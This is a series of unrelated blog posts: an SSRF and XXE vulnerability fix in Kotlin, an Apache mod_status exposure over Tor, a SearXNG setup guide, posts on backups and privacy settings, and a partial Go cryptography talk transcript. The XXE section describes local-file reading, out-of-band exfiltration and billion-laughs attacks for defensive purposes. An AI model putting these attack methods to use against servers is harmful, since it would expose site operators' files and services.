private/localhost URL: $imageUrl") return imageUrl } ... private fun isPrivateOrLocalhost(host: String): Boolean { if (host in listOf("localhost", "127.0.0.1", "::1")) return true val address = try { java.net.InetAddress.getByName(host) } catch (_: Exception) { return true // When in doubt, block it } return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress } ``` But here, I still have a risk. The user can write: ```html ``` And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests: ```kotlin val connection = url.openConnection() if (connection is java.net.HttpURLConnection) { connection.instanceFollowRedirects = false } connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode if (responseCode in listOf(301, 302, 303, 307, 308)) { logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)") return imageUrl } ``` Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka: > You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :) ## The XXE Vulnerability XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to: - Read local files (/etc/passwd, config files, SSH keys...) - Perform SSRF (requests to internal services) - Perform DoS (billion laughs attack) Micka modified the WordPress XML file to add an entity declaration: ```xml ]> ... &xxe; ``` This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly: ```xml %dtd; ]> ``` And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd): ```xml "> %all; ``` Finally, to crash a server, the attacker could also have done this: ```xml ]> &lol9; 1 publish post ``` This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea. We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities: ```kotlin val factory = DocumentBuilderFactory.newInstance() // Disable external entities (XXE protection) factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) factory.setFeature("http://xml.org/sax/features/external-general-entities", false) factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false) factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false) factory.isXIncludeAware = false factory.isExpandEntityReferences = false ``` I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.

0 views
neilzone 2 weeks ago

Using a2dismod apache2's mod_status which exposed information via a .onion / Tor hidden service

Earlier this week, I received a vulnerability report. The report said that, when accessing the site/server via the .onion / Tor hidden service URL, it was possible to view information about the server, and live connections to it, because of . is an apache2 default module, which shows information about the apache2 server on /server-status. It is only available via localhost but, because of the default configuration of a Tor .onion/hidden service, which entails proxying to localhost, it was available. The report was absolutely valid, and I am grateful for it. Thank you, kind anonymous reporter. It was easily fixed, made all the more annoying because I knew about this issue (it has been discussed for years) but forgot to disable the module when I moved the webserver a few months ago. One to chalk up to experience I have had a security.txt file in place on the decoded.legal website for quite a while now, but I’ve never had anyone use it. I asked the person who reported it to me if they had contacted me via it, but no, they had not.

0 views
マリウス 2 weeks ago

Be Your Own Privacy-Respecting Google, Bing & Brave

Search engines have long been a hot topic of debate, particularly among the tinfoil-hat-wearing circles on the internet. After all, these platforms are in a unique position to collect vast amounts of user data and identify individuals with unsettling precision. However, with the shift from traditional web search, driven by search queries and result lists, to a LLM-powered question-and-answer flow across major platforms, concerns have grown and it’s no longer just about privacy: Today, there’s increasing skepticism about the accuracy of the results. In fact, it’s not only harder to discover new information online, but verifying the accuracy of these AI-generated answers has become a growing challenge. As with any industry upended by new technology, a flood of alternatives is hitting the market, promising to be the antidote to the established players. However, as history has shown, many of these newcomers are unlikely to live up to their initial hype in the long run. Meanwhile, traditional search services are either adopting the same LLM-driven approach or shutting down entirely . However, as long as major search engines still allow software to tap into their vast databases without depending too heavily on their internal algorithms and AI-generated answers, there’s some hope. We can take advantage of these indexes and create our own privacy-respecting search engines that prioritize the content we actually want to see. Let’s check how to do so using the popular metasearch engine SearxNG on OpenBSD ! SearXNG is a free and open-source metasearch engine, initially forked from Searx after its discontinuation, which can tap into over 70 different search engines to receive search results from. Note: SearXNG is not a search engine but a metasearch engine, which means that it does not have its own index but instead it uses existing indexes from e.g. Google , Brave , Bing , Mojeek , and others. What SearXNG does is that it runs your search query through all of the search engines that you have enabled on your SearXNG instance, onto which it applies custom prioritization and removal rules in an effort to tailor the results to your taste . SearXNG is not particularly resource-intensive and doesn’t require significant storage space, as it does not maintain its own search index. However, depending on your performance requirements, you may need to choose between slightly longer wait times or higher costs, especially for cloud instances. I tested SearXNG on a Vultr instance with 1 vCPU and 1GB of RAM, and it performed adequately. That said, for higher traffic or more demanding usage, you’ll need to allocate more CPU and RAM to ensure optimal performance. Let’s start by setting up the base system. This guide assumes you’re using the latest version of OpenBSD (7.8, at the time of writing) and that you’ve already configured and secured SSH access. Additionally, your firewall should be set up to allow traffic on ports 22, 80, and 443. Ideally, you should also have implemented preventive measures against flooding and brute-force attacks, such as PF ’s built-in rate limiting. Note: I’m going to use as domain for this specific setup, as well as as hostname for the SearXNG instance. Make sure to replace these values with your domain/preferred hostname in the configuration files below. First, let’s install the dependencies that we need: The default configuration of redis works just fine for now, so we can enable and start the service right away: Next, we create a dedicated user for SearXNG : With the newly created user we clone the SearXNG repository from GitHub and set up a Python virtual environment : Next, we copy the default configuration from the repository to ; Make sure to beforehand: While the default settings will work just fine it’s advisable to configure the according to your requirements. One key element that will make or break your experience with SearXNG is the plugin and its configuration. Make sure to enable the plugin: … and make sure to properly configure it: The configuration tells SearXNG to rewrite specific URLs. This is especially useful if you’re not running LibRedirect but would still like results from e.g. X.com to open on Xcancel.com instead. The configuration contains URLs that you want SearXNG to completely remove from your search results, e.g. Pinterest , Facebook or LinkedIn (unless you need those for OSINT ). The configuration lists URLs that SearXNG should de-prioritize in your search results. The setting, on the other hand, does the exact opposite: It instructs SearXNG to prioritize results from the listed URLs. If you need examples for those files feel free to check the lycos.lol repository . PS: Definitely make sure to change the ! We’re going to run SearXNG using uWSGI , a popular Python web application server. To do so, we create the file with the following content: Next, we create the file with the following content: This way we can use to enable and run uWSGI by issuing the following commands: Info: In case the startup should fail, it is always possible to and start uWSGI manually to see what the issue might be: For serving the Python web application we use Nginx . Therefor, we create with the following content: We include this file in our main configuration: Note: I’m not going to dive into the repetitive SSL setup, but you can find plenty other write-ups on this site that explain how to configure it on OpenBSD. Next, we enable Nginx and start it: You should be able to access your SearXNG instance by navigating to in a browser. In case you encounter issues with the semaphores required for interprocess communication within uWSGI , make sure to check [the settings][sminfo] and increase specifically the parameter, e.g. by adding the following line to : As can be seen, setting up a SearXNG instance on OpenBSD is fairly easy and doesn’t require much work. However, configuring it to your liking so that you can get the search results you’re interested in is going to require more effort and time. Especially the plugin is likely something that will evolve over time, the more you’ll use the search engine. At this point, however, you’re ready to enjoy your self-hosted, privacy-respecting metasearch engine based upon SearXNG ! :-) I had registered the domain for this closed-access SearXNG instance. However, a day after the domain became active, NIC.LOL set the domain status to . I asked Njalla , my registrar, if they would know more and their reply was: Right now the domain in question has the status code “serverHold”. serverHold is a status code set by the registry (the one that manage the whole TLD) and that means they have suspended the domain name because the domain violated their terms or rules. Upon further investigation, it became clear that the domain was falsely flagged by everyone’s favorite tax-haven-based internet bully, Spamhaus . After all, when the domain was dropped globally the only thing that was visible on the domain’s Nginx was an empty page. The domain also didn’t have (and still hasn’t) any MX records configured. I reached out to Spamhaus who replied with the following message: Thank you for contacting the Spamhaus Ticketing system, It appears that this ticket was submitted using a disposable or temporary email address; because of this, we cannot confirm its authority. To ensure that we can help you, please do not use a temporary email address (this includes freemails such as gmail.com, hotmail.com, etc) and ensure that the ticket contains the following: When these issues have been resolved, another ticket may be opened to request removal. – Regards, Marvin Adams The Spamhaus Project Spamhaus flagged the domain I just purchased, which I could have used for sending email. Upon contacting them, they then closed my ticket because I was using a temporary email address instead of, let’s say, my own lycos.lol domain. And even though it was a free or temporary email that I had sent the email from, I thought it was my domain registrar’s responsibility to handle KYC, not Spamhaus ’s. I’ve always known that Spamhaus is an incompetent and corrupt organization, but I didn’t fully realize how mentally challenged they are until now. Also, shoutout to NIC.LOL for happily taking my cash without providing any support in this matter whatsoever. This serves as a harsh reminder that the once fun place we called the internet is dead and that everything these days is controlled by corporations which you’re always at the mercy of. It also highlights how misleading and inaccurate some popular posts on sites like Hacker News can be, e.g. “Become unbannable from your email” . They’re not just lacking in detail but they’re obviously wrong with the unbannable part. After some back-and-forth, I managed to get back online and set up the SearXNG instance. The instance will be available to members of the community channel . Additionally, I’ve taken further steps to protect this website from future hostility by Spamhaus: Say hello to ! More on that in a future status update . Footnote: The artwork was generated using AI and further botched by me using the greatest image manipulation program . Learn why . Information that makes clear the requestor’s authority over the domain or IP Details on how the issue(s) have been addressed Reference any other Spamhaus removal ticket numbers related to this case

0 views
DHH 2 weeks ago

No backup, no cry

I haven't done a full-system backup since back in the olden days before Dropbox and Git. Every machine I now own is treated as a stateless, disposable unit that can be stolen, lost, or corrupted without consequences. The combination of full-disk encryption and distributed copies of all important data means there's just no stress if anything bad happens to the computer. But don't mistake this for just a "everything is in the cloud" argument. Yes, I use Dropbox and GitHub to hold all the data that I care about, but the beauty of these systems is that they work with local copies of that data, so with a couple of computers here and there, I always have a recent version of everything, in case either syncing service should go offline (or away!). The trick to making this regime work is to stick with it. This is especially true for Dropbox. It's where everything of importance needs to go: documents, images, whatever. And it's instantly distributed on all the machines I run. Everything outside of Dropbox is essentially treated as a temporary directory that's fully disposable. It's from this principle that I built Omarchy too. Given that I already had a way to restore all data and code onto a new machine in no time at all, it seemed so unreasonable that the configuration needed for a fully functional system still took hours on end. Now it's all encoded in an ISO setup that installs in two minutes on a fast computer. Now it's true that this method relies on both multiple computers and a fast internet connection. If you're stuck on a rock in the middle of nowhere, and you somehow haven't discovered the glory of Starlink, maybe just stick to your old full-disk backup ways. But if you live in the modern world, there ought to be no reason why a busted computer is a calamity of data loss or a long restore process.

1 views
The Jolly Teapot 2 weeks ago

Praise the Backup

Well, that was a fun weekend. I have spent half of my time reinstalling MacOS Sequoia , and trying to get it back the way it was, while trying to avoid losing important files. You see, on that chilly Saturday afternoon, I wanted to take care of my ageing computer, and tried an app that was supposed to clean the old files and “residue” from previously uninstalled apps. As a reader of this blog, you may know that I tend to use very few apps , but I try a lot of them . Trying a lot of apps means doing a lot of installs, and then a lot of uninstall processes. So, while experimenting with yet another app, it crashed in the middle of its cleaning work. And, because I was being dumb, I thought it would be a good idea to empty the bin at that moment. 5, 10, 15, 20, 25… These were the thousands of files being deleted permanently from the bin. Even with lots of old app files, the number still seemed rather high. I stopped the process only after losing thousands of files and realised that this cleaning app had put in the bin a lot of files and folders that it shouldn't have. A lot of files and folders. My blog files with all my Eleventy settings, all of it. Most of my system preference files. The app even deleted its own application files, which is why the app crashed, I believe. None of my other apps or extensions could be launched, error messages everywhere. I was having a lot of fun. I restarted my computer, hoping the powerful reboot spirits would once again act miraculously, but my dear old MacBook Air welcomed me as it was a brand-new Mac, almost fresh installation. Even my keyboard was set to the wrong layout (which made it truly fantastic to enter a password in such a moment of panic), my wallpaper was gone, the dock was featuring all the default apps, and I was logged off my iCloud account. Thankfully, this last part turned out to be a good thing because my personal and most important files, stored on iCloud Drive, were safe from whatever had happened on my machine. I also had a two-month-old backup on an external SSD, mirrored on JottaCloud . The cherry on top was that I couldn’t use the “Put Back” right-click action on the files left in the bin as they were not put there by the Finder, but by this third-party app. 1 There were 1200 files and folders left or so, most of them obscure preference files. Needless to say that I didn’t really bother taking hours of my weekend putting them back where they belonged, even if I knew how. I scavenged what I could, everything that seemed important — including a folder called “BBEdit Backups” (more on that later) — and used this opportunity to start anew. Since my last backup was two months old, needless to say that I had a decent amount of work to do putting everything back together, including the last four posts of the website you're reading — which had been vaporised from my computer. I had to reinstall all my apps, my preferences, my keyboard shortcuts, everything that I could, while I could still recall what they were in detail. I won’t blame the app that caused all of this, or my old computer, as much as I will blame myself. I should have been more careful about how to use it properly, I shouldn’t have decided to empty the bin at that moment, and I should have done better and more frequent backups: once every quarter is definitely not enough. The clean MacOS install experience itself was not great: It was very slow, annoying, and during all this time I worried about not being able to connect to my site again or make Eleventy work the same way it did (sorry if I get a little PTSD ). 2 Today, as I write this, my computer doesn’t really feel any faster; a clean install can only do so much on the last generation of Intel MacBook Airs. MacOS was a pain, and I was reminded of my Windows user days more than I expected. For example, I kept getting a message along the lines of “The widget blahblahblah is a different version from a previous version of that widget, do you want to open it?” and clicking “No” just brought back the pop-up window three or four more times before it eventually went away. The prompt even interrupted me while I was trying to type my complicated Wi-Fi password. Not once, not twice, but thrice. Now, everything seems fine. Eleventy works. Xmit works. BBEdit is just like it was. This whole experience made me realise three main things. Apologies if you see anything weird on this site: some little layout issues and typos that were fixed in the last two months may have returned. Please let me know if you see anything suspicious (or any of the usual typos). In the meantime, don’t be an idiot like me: take care of those backups. I won’t name the app in this post because I’m not 100% sure if the app was the sole guilty party in this affair, if guilty at all. Maybe I didn’t set it up right, maybe it’s all my fault!  ↩︎ As the song goes.  ↩︎ That BBEdit is, indeed, just too good . I’m not sure if I could have brought everything back so quickly and confidently without this app. The BBEdit automated backup folder, the one I found in the bin, really saved me. Many of the most recent versions of the Jolly Teapot text files were still there, so I didn’t have to import the text from the live website. Just when I thought I couldn’t love this app more than I already did. I’m proud of myself for thinking of creating a backup of my BBEdit preferences too. That I seriously needed to create a better backup system so that in the event of something like this happening again, whether a human error or an app shitting the bed, I would only have a week or two of files to recover, and not a whole nine weeks of them. I just created an Automator workflow to help me automate my backups and include more files. I considered using Time Machine on my external SSD, or using an app like Hazel , but for my minimal needs, this Automator workflow should do just fine. That I may have actually enjoyed all of this: the crash and this weird situation gave me an excuse to both operate a clean installation on my Mac and justify the purchase of a new one. I will probably wait until March for the next generation of MacBooks Air, but the regular M5 MacBook Pro has never looked so good. I won’t name the app in this post because I’m not 100% sure if the app was the sole guilty party in this affair, if guilty at all. Maybe I didn’t set it up right, maybe it’s all my fault!  ↩︎ As the song goes.  ↩︎

1 views
iDiallo 2 weeks ago

Making a quiet stand with your privacy settings

After making one of the largest refactor of our application, one that took several months in the making, where we tackled some of our biggest challenges. We tackled technical debt, upgraded legacy software, fortified security, and even made the application faster. After all that, we deployed the application, and held our breath, waiting for the user feedback to roll in. Well, nothing came in. There were no celebratory messages about the improved speed, no complaints about broken features, no comments at all. The deployment was so smooth it was invisible. To the business team, it initially seemed like we had spent vast resources for no visible return. But we knew the underlying truth. Sometimes, the greatest success is defined not by what happens, but by what doesn't happen. The server that doesn't crash. The data breach that doesn't occur. The user who never notices a problem. This is the power of a quiet, proactive defense. In this digital world, where everything we do leaves a data point, it's not easy to recognize success. When it comes to privacy, taking a stand isn't dramatic. In fact, its greatest strength is its silence. We're conditioned to believe that taking a stand should feel significant. We imagine a public declaration, a bold button that flashes "USER REBELLION INITIATED!" when pressed. Just think about people publicly announcing they are leaving a social media platform. But the reality of any effective digital self-defense is far more mundane. When I disagree with a website's data collection, I simply click "Reject All." No fanfare. No message telling the company, "This user is privacy-conscious!" My resistance is registered as a non-action. A void in their data stream. When I read that my Vizio Smart TV was collecting viewing data, I navigated through a labyrinth of menus to find the "Data Collection" setting and turned it off. The TV kept working just fine. Nothing happened, except that my private viewing habits were no longer becoming a product to be sold. They didn't add a little icon on the top corner that signifies "privacy-conscious." Right now, many large language models like ChatGPT have "private conversation" settings turned off by default. When I go into the settings and enable the option that says, "Do not use my data for training," there's no confirmation, no sense of victory. It feels like I've done nothing. But I have. This is how proactive inaction looks like. Forming a new habit is typically about adding an action. Going for a run every morning, drinking a glass of water first thing, reading ten pages a night. But what about the habit of not doing ? When you try to simply "not eat sugar," you're asking your brain to form a habit around an absence. There's no visible behavior to reinforce, no immediate sensory feedback to register success, and no clear routine to slot into the habit loop. Instead, you're relying purely on willpower. A finite resource that depletes throughout the day, making evening lapses almost inevitable. Your brain literally doesn't know what to practice when the practice is "nothing." It's like trying to build muscle by not lifting weights. The absence of action creates an absence of reinforcement, leaving you stuck in a constant battle of conscious resistance rather than unconscious automation. Similarly, the habit of not accepting default settings is a habit of inaction. You are actively choosing to not participate in a system designed to exploit your data. It's hard because it lacks the dopamine hit of a checked box. There's no visible progress bar for "Privacy Secured." But the impact is real. This quiet practice is our primary defense against what tech writer Cory Doctorow calls "enshittification". That's the process where platforms decay by first exploiting users, then business customers, until they become useless, ad-filled pages with content sprinkled around. It's also our shield against hostile software that prioritizes its own goals over yours. Not to blame the victims, but I like to remind people that they have agency over the software and tools they use. And your agency includes the ultimate power to walk away. If a tool's settings are too hostile, if it refuses to respect your "no," then your most powerful setting is the "uninstall" button. Choosing not to use a disrespectful app is the ultimate, and again, very quiet, stand. So, I challenge everyone to embrace the quiet. See the "Reject All" button not as a passive refusal, but as an active shield. See the hidden privacy toggle not as a boring setting, but as a toggle that you actively search for. The next time you download a new app or create a new account, take five minutes. Go into the settings. Look for "Privacy," "Data Sharing," "Personalization," or "Permissions." Turn off what you don't need. Nothing will happen. Your feed won't change, the app won't run slower, and no one will send you a congratulatory email. And that's the whole point. You will have succeeded in the same way our refactor succeeded: by ensuring something unwanted doesn't happen. You've strengthened your digital walls, silently and without drama, and in doing so, you've taken one of the most meaningful stands available to us today.

0 views
Filippo Valsorda 2 weeks ago

The 2025 Go Cryptography State of the Union

This past August, I delivered my traditional Go Cryptography State of the Union talk at GopherCon US 2025 in New York. It goes into everything that happened at the intersection of Go and cryptography over the last year. You can watch the video (with manually edited subtitles, for my fellow subtitles enjoyers) or read the transcript below (for my fellow videos not-enjoyers). The annotated transcript below was made with Simon Willison’s tool . All pictures were taken around Rome, the Italian contryside, and the skies of the Northeastern United States. Welcome to my annual performance review. We are going to talk about all of the stuff that we did in the Go cryptography world during the past year. When I say "we," it doesn't mean just me, it means me, Roland Shoemaker, Daniel McCarney, Nicola Morino, Damien Neil, and many, many others, both from the Go team and from the Go community that contribute to the cryptography libraries all the time. I used to do this work at Google, and I now do it as an independent as part of and leading Geomys , but we'll talk about that later. When we talk about the Go cryptography standard libraries, we talk about all of those packages that you use to build secure applications. That's what we make them for. We do it to provide you with encryption and hashes and protocols like TLS and SSH, to help you build secure applications . The main headlines of the past year: We shipped post quantum key exchanges, which is something that you will not have to think about and will just be solved for you. We have solved FIPS 140, which some of you will not care about at all and some of you will be very happy about. And the thing I'm most proud of: we did all of this while keeping an excellent security track record, year after year. This is an update to something you've seen last year. The Go Security Track Record It's the list of vulnerabilities in the Go cryptography packages. We don't assign a severity—because it's really hard, instead they're graded on the "Filippo's unhappiness score." It goes shrug, oof, and ouch. Time goes from bottom to top, and you can see how as time goes by things have been getting better. People report more things, but they're generally more often shrugs than oofs and there haven't been ouches. More specifically, we haven't had any oof since 2023. We didn't have any Go-specific oof since 2021. When I say Go-specific, I mean: well, sometimes the protocol is broken, and as much as we want to also be ahead of that by limiting complexity, you know, sometimes there's nothing you can do about that. And we haven't had ouches since 2019 . I'm very happy about that. But if this sounds a little informal, I'm also happy to report that we had the first security audit by a professional firm. Trail of Bits looked at all of the nuts and bolts of the Go cryptography standard library: primitives, ciphers, hashes, assembly implementations. They didn't look at the protocols, which is a lot more code on top of that, but they did look at all of the foundational stuff. And I'm happy to say that they found nothing . Two of a kind t-shirts, for me and Roland Shoemaker. It is easy though to maintain a good security track record if you never add anything, so let's talk about the code we did add instead. First of all, post-quantum key exchanges. We talked about post-quantum last year, but as a very quick refresher: Now, we focused on post-quantum key exchange because the key exchange defends against the most urgent risk, which is that somebody might be recording connections today, keeping them saved on some storage for the next 5-50 years and then use the future quantum computers to decrypt those sessions. I'm happy to report that we now have ML-KEM, which is the post-quantum key exchange algorithm selected by the NIST competition, an international competition run in the open. You can use it directly from the crypto/mlkem standard library package starting in Go 1.24, but you're probably not gonna do that. Instead, you're probably going to just use crypto/tls, which by default now uses a hybrid of X25519 and ML-KEM-768 for all connections with other systems that support it. Why hybrid? Because this is new cryptography. So we are still a little worried that somebody might break it. There was one that looked very good and had very small ciphertext, and we were all like, “yes, yes, that's good, that's good.” And then somebody broke it on a laptop. It was very annoying. We're fairly confident in lattices. We think this is the good one. But still, we are taking both the old stuff and the new stuff, hashing them together, and unless you have both a quantum computer to break the old stuff and a mathematician who broke the new stuff, you're not breaking the connection. crypto/tls can now negotiate that with Chrome and can negotiate that with other Go 1.24+ applications. Not only that, we also removed any choice you had in ordering of key exchanges because we think we know better than you and— that didn't come out right, uh. … because we assume that you actually want us to make those kind of decisions, so as long as you don't turn it off, we will default to post-quantum. You can still turn it off. But as long as you don't turn it off, we'll default to the post-quantum stuff to keep your connection safe from the future. Same stuff with x/crypto/ssh. Starting in v0.38.0. SSH does the same thing, they just put X25519 and ML-KEM-768 in a different order, which you would think doesn't matter—and indeed it doesn't matter—but there are rules where "no, no, no, you have to put that one first." And the other rule says "no, you have to put that one first." It's been a whole thing. I'm tired. OpenSSH supports it, so if you connect to a recent enough version of OpenSSH, that connection is post-quantum and you didn't have to do anything except update. Okay, but you said key exchanges and digital signatures are broken. What about the latter? Well, key exchanges are urgent because of the record-now-decrypt-later problem, but unless the physicists that are developing quantum computers also develop a time machine, they can't use the QC to go back in time and use a fake signature today. So if you're verifying a signature today, I promise you it's not forged by a quantum computer. We have a lot more time to figure out post-quantum digital signatures. But if we can, why should we not start now? Well, it's different. Key exchange, we knew what hit we had to take. You have to do a key exchange, you have to do it when you start the connection, and ML-KEM is the algorithm we have, so we're gonna use it. Signatures, we developed a lot of protocols like TLS, SSH, back when it was a lot cheaper to put signatures on the wire. When you connect to a website right now, you get five signatures. We can't send you five 2KB blobs every time you connect to a website. So we are waiting to give time to protocols to evolve, to redesign things with the new trade-offs in mind of signatures not being cheap. We are kind of slow rolling intentionally the digital signature side because it's both not as urgent and not as ready to deploy. We can't do the same “ta-da, it's solved for you” show because signatures are much harder to roll out. Let's talk about another thing that I had mentioned last year, which is FIPS 140. FIPS 140 is a US government regulation for how to do cryptography. It is a list of algorithms, but it's not just a list of algorithms. It's also a list of rules that the modules have to follow. What is a module? Well, a module used to be a thing you would rack. All the rules are based on the idea that it's a thing you can rack. Then the auditor can ask “what is the module’s boundary?” And you're like, “this shiny metal box over here." And, you know, that works. When people ask those questions of libraries, though, I do get a little mad every time. Like, what are the data input ports of your library? Ports. Okay. Anyway, it's an interesting thing to work with. To comply with FIPS 140 in Go, up to now, you had to use an unsupported GOEXPERIMENT, which would replace all of the Go cryptography standard library, all of the stuff I'm excited about, with the BoringCrypto module, which is a FIPS 140 module developed by the BoringSSL folks. We love the BoringSSL folks, but that means using cgo, and we do not love cgo. It has memory safety issues, it makes cross-compilation difficult, it’s not very fast. Moreover, the list of algorithms and platforms of BoringCrypto is tailored to the needs of BoringSSL and not to the needs of the Go community, and their development cycle doesn't match our development cycle: we don't decide when that module gets validated. Speaking of memory safety, I lied a little. Trail of Bits did find one vulnerability. They found it in Go+BoringCrypto, which was yet another reason to try to push away from it. Instead, we've got now the FIPS 140-3 Go Cryptographic Module. Not only is it native Go, it's actually just a different name for the internal Go packages that all the regular Go cryptography package use for the FIPS 140 algorithms. We just moved them into their own little bubble so that when they ask us “what is the module boundary” we can point at those packages. Then there's a runtime mode which enables some of the self-tests and slow stuff that you need for compliance. It also tells crypto/tls not to negotiate stuff that's not FIPS, but aside from that, it doesn't change any observable behavior. We managed to keep everything working exactly the same: you don't import a different package, you don't do anything different, your applications just keep working the same way. We're very happy about that. Finally, you can at compile time select a GOFIPS140 frozen module, which is just a zip file of the source of the module as it was back when we submitted it for validation, which is a compliance requirement sometimes. By the way, that means we have to be forward compatible with future versions of Go, even for internal packages, which was a little spicy. You can read more in the upstream FIPS 140-3 docs . You might be surprised to find out that using a FIPS 140 algorithm from a FIPS 140 module is not actually enough to be FIPS 140 compliant The FIPS 140 module also has to be tested for that specific algorithm. What we did is we just tested them all, so you can use any FIPS 140 algorithm without worrying about whether it's tested in our module. When I say we tested them all, I mean that some of them we tested with four different names. NIST calls HKDF alternatively SP 800-56C two-step KDF, SP 800-133 Section 6.3 CKG, SP 800-108 Feedback KDF, and Implementation Guidance D.P OneStepNoCounter KDF (you don't wanna know). It has four different names for the same thing. We just tested it four times, it's on the certificate, you can use it whatever way you want and it will be compliant. But that's not enough. Even if you use a FIFS 140 algorithm from a FIPS 140 module that was tested for the algorithm it's still not enough because it has to run on a platform that was tested as part of the validation. So we tested on a lot of platforms. Some of them were paid for by various Fortune 100s that had an interest in them getting tested, but some of them had no sponsors. We really wanted to solve this problem for everyone, once and for all, so Geomys just paid for all the FreeBSD, macOS, even Windows testing so that we could say “run it on whatever and it's probably going to be compliant.” (Don't quote me on that.) How did we test on that many machines? Well, you know, we have this sophisticated data center… Um, no. No, no. I got a bunch of stuff shipped to my place. That's my NAS now. It's an Ampere Altra Q64-22, sixty-four arm64 cores, and yep, it's my NAS. Then I tested it on, you know, this sophisticated arm64 macOS testing platform. And then on the Windows one, which is my girlfriend's laptop. And then the arm one, which was my router. Apparently I own an EdgeRouter now? It's sitting in the data center which is totally not my kitchen. It was all a very serious and regimented thing, and all of it is actually recorded, in recorded sessions with the accredited laboratories, so all this is now on file with the US government. You might or might not be surprised to hear that the easiest way to meet the FIPS 140 requirements is not to exceed them. That's annoying and a problem of FIPS 140 in general: if you do what everybody else does, which is just clearing the bar, nobody will ask questions, so there’s a strong temptation to lower security in FIPS 140 mode. We just refused to accept that. Instead, we figured out complex stratagems. For example, for randomness, the safest thing to do is to just take randomness from the kernel every time you need it. The kernel knows if a virtual machine was just cloned and we don't, so we risk generating the same random bytes twice. But NIST will not allow that. You need to follow a bunch of standards for how the randomness is generated, and the kernel doesn’t. So what we do is we do everything that NIST asks and then every time you ask for randomness, we squirrel off, go to the kernel, get a little piece of extra entropy, stir it into the pot before giving back the result, and give back the result. It's still NIST compliant because it's as strong as both the NIST and the kernel solution, but it took some significant effort to show it is compliant. We did the same for ECDSA. ECDSA is a digital signature mechanism. We've talked about it a few other times. It's just a way to take a message and a private key and generate a signature, here (s, r) . To make a signature, you also need a random number, and that number must be used only once with the same private key. You cannot reuse it. That number is k here. Why can you not reuse it? Because if you reuse it, then you can do this fun algebra thing and then pop the private key falls out by just smashing two signatures together. Bad, really, really bad. How do we generate this number that must never be the same? Well, one option is we make it random. But what if your random number generator breaks and generates twice the same random number? That would leak the private key, and that would be bad. So the community came up with deterministic ECDSA . Instead of generating the nonce at random, we are going to hash the message and the private key. This is still actually a little risky though, because if there's a fault in the CPU , for example, or a bug, because for example you're taking the wrong inputs , you might still end up generating the same value but signing a slightly different message. How do we mitigate both of those? We do both. We take some randomness and the private key and the message, we hash them all together, and now it's really, really hard for the number to come out the same. That's called hedged ECDSA. The Go crypto library has been doing hedged ECDSA from way before it was called hedged and way before I was on the team . Except… random ECDSA has always been FIPS. Deterministic ECDSA has been FIPS since a couple years ago. Hedged ECDSA is technically not FIPS. We really didn't want to make our ECDSA package less secure, so we found a forgotten draft that specifies a hedged ECDSA scheme, and we proceeded to argue that actually if you read SP 800-90A Revision 1 very carefully you realize that if you claim that the private key is just the DRBG entropy plus two-thirds of the DRBG nonce, you are allowed to use it because of SP 800-57 Part 1, etc etc etc . We basically just figured out a way to claim it was fine and the lab eventually said "okay, shut up." I'm very proud of that one. If you want to read more about this, check out the announcement blog post . If you know you need commercial services for FIPS 140, here’s Geomys FIPS 140 commercial services page . If you don't know if you need them, you actually probably don't. It's fine, the standard library will probably solve this for you now. Okay, but who cares about this FIPS 140 stuff? "Dude, we've been talking about FIPS 140 for 10 minutes and I don't care about that." Well, I care because I spent my last year on it and that apparently made me the top committer for the cycle to the Go repo and that's mostly FIPS 140 stuff. I don't know how to feel about that. There have been actually a lot of positive side effects from the FIPS 140 effort. We took care to make sure that everything that we found we would leave in a better state. For example, there are new packages that moved from x/crypto into the standard library: crypto/hkdf, crypto/pbkdf, crypto/sha3. SHA-3 is faster and doesn't allocate anymore. HKDF has a new generic API which lets you pass in a function that returns either a concrete type that implements Hash or a function that returns a Hash interface, which otherwise was a little annoying. (You had to make a little closure.) I like it. We restructured crypto/aes and crypto/cipher and in the process merged a contribution from a community member that made AES-CTR, the counter mode, between 2 and 9 times faster. That was a pretty good result. The assembly interfaces are much more consistent now. Finally, we finished cleaning up crypto/rsa. If you remember from last year, we made the crypto/rsa sign and verify operations not use math/big and use constant time code. Now we also made key generation, validation, and pre-computation all not use math/big. That loading keys that were serialized to JSON a lot faster, and made key generation much faster. But how much faster? Benchmarking key generation is really hard because it's a random process: you take a number random number and you check, is it prime? No. Toss. Is it prime? Nope. Toss. Is it prime? You keep doing this. If you're lucky, it’s very fast. If you are unlucky, very slow. It’s a geometric distribution and if you want to average it out, you have to run for hours. Instead, I figured out a new way by mathematically deriving the average number of pulls you are supposed to do and preparing a synthetic run that gives exactly the expected mean number of checks, so that we get a representative sample to benchmark deterministically . That was a lot of fun. Moreover, we detect more broken keys, and we did a rare backwards compatibility break to stop supporting keys smaller than 1024 bits. 1024 is already pretty small, you should be using 2048 minimum, but if you're using less than 1024, it can be broken on the proverbial laptop. It's kind of silly that a production library lets you do something so insecure, and you can't tell them apart just by looking at the code. You have to know what the size of the key is. So we just took that out. I expected people to yell at me. Nobody yelled at me. Good job community. Aside from adding stuff, you know that we are very into testing and that testing is how we keep that security track record that we talked about. I have one bug in particular that is my white whale. (You might say, "Filippo, well-adjusted people don't have white whales." Well, we learned nothing new, have we?) My white whale is this assembly bug that we found at Cloudflare before I joined the Go team. I spent 